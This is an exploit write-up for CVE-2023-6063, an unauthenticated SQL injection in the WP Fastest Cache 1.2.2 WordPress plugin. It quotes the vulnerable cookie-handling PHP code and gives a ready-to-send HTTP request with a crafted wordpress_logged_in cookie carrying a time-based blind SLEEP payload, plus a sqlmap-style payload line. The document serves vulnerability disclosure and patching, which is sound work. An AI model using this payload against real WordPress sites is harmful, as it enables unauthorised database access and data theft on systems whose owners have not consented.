# Exploit Title: Unauthenticated SQL Injection in WP Fastest Cache 1.2.2 # Date: 14.11.2023 # Exploit Author: Meryem Taşkın # Vendor Homepage: https://www.wpfastestcache.com/ # Software Link: https://wordpress.org/plugins/wp-fastest-cache/ # Version: WP Fastest Cache 1.2.2 # Tested on: WP Fastest Cache 1.2.2 # CVE: CVE-2023-6063 ## Description An SQL injection vulnerability exists in version 1.2.2 of the WP Fastest Cache plugin, allowing an attacker to trigger SQL queries on the system without authentication. ## Vuln Code public function is_user_admin(){ global $wpdb; foreach ((array)$_COOKIE as $cookie_key => $cookie_value){ if(preg_match("/wordpress_logged_in/i", $cookie_key)){ $username = preg_replace("/^([^\|]+)\|.+/", "$1", $cookie_value); break; } } if(isset($username) && $username){ $res = $wpdb->get_var("SELECT `$wpdb->users`.`ID`, `$wpdb->users`.`user_login`, `$wpdb->usermeta`.`meta_key`, `$wpdb->usermeta`.`meta_value` FROM `$wpdb->users` INNER JOIN `$wpdb->usermeta` ON `$wpdb->users`.`user_login` = \"$username\" AND # $username varible is not escaped vulnerable to SQL injection ..... ## Exploit GET / HTTP/1.1 Cookie: wordpress_logged_in_1=%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29A%29%20AND%20%221%22%3D%221 Host: meryem.local ## Parameter: Cookie #1* ((custom) HEADER) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: wordpress_logged_in_dsadasdasd=" AND (SELECT 3809 FROM (SELECT(SLEEP(5)))RDVP) AND "HQDg"="HQDg --- ## References - [WPScan Blog Post](https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/) - [WPScan Vulnerability](https://wpscan.com/vulnerability/30a74105-8ade-4198-abe2-1c6f2967443e/) - [CVE-2023-6063](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6063) ## Credits - Original Researcher: Alex Sanford - PoC: Meryem Taşkın